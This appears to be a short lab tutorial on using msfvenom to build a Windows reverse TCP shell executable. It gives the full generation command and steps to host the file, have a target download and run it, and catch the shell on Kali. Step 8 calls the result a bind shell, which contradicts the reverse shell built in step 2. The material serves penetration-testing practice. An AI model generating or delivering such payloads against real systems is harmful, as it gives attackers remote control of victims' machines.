Getting started with MSFvenom

  1. Find a Singles Payload

Read more: https://www.offensive-security.com/metasploit-unleashed/payloads/

2. Create a payload using

msfvenom -p /windows/x64/shell_reverse_tcp lhost=<localhost IP> lport=<port number> -f exe -o <file name>

3. Check the details of the created .exe file

4. Run a webserver to host the .exe file

5. Set up a listener on Kali

6. Target Windows: Browse Kali IP and download the file.

7. Run the file

8. Verify bind shell on Kali

--

--